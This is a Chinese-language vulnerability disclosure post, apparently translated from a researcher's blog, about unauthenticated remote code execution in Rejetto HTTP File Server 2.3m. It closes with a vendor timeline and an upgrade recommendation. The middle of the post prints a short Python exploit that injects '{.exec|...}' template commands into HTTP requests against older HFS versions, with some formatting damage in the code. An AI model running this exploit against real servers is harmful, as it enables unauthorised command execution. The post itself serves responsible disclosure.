Rejetto HTTP 文件服务器 2.3m 未经身份验证的 RCE

Rejetto HTTP 文件服务器

在红队评估期间，我偶然发现了一个神秘的网络应用程序：

以下是我在 80/tcp 端口遇到的情况

该网络应用程序被确认为 Rejetto HFS，这是一个曾经流行的 Windows 网络服务器，于 2002 年 8 月首次发布。

通过快速在线搜索，我发现 2.3m 版本没有已知漏洞。然而，我惊讶地发现旧版本有大量 RCE！

import socket

url = raw_input("Enter URL : ")try:      while True:            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)            sock.connect((url, 80))            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")            req = "GET /?{.exec|"+cmd+".}"            req += " HTTP/1.1rnrn"            sock.send(req)            sock.close()            print "Done!"except KeyboardInterrupt:      print "Bye!"

我决定发布删节版的截图

这有点困难，但最终我创建了一个 POC，它不仅可以执行代码，还可以返回输出并将自身隐藏在日志文件中（通过空字节）。请注意，Host 标头的值也被篡改了，这对于注入至关重要。

报告

我很遗憾地得知 Rejetto HTTP File Server 2.x 现已过时且不再受支持。在与 Massimo Melina 讨论后，我们得出结论，我们应该建议所有用户更新到 HFS 3。

时间线

18/08/2023 — Reported to the vendor

21/08/2023 — Reply received

24/05/2024 — Vendor informed about disclosure

24/05/2024 — Reply received

25/05/2024 — Article released

25/05/2024 — CVE Request 1671764

Rejetto HTTP File Server 2.3m Unauthenticated RCEhttps://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/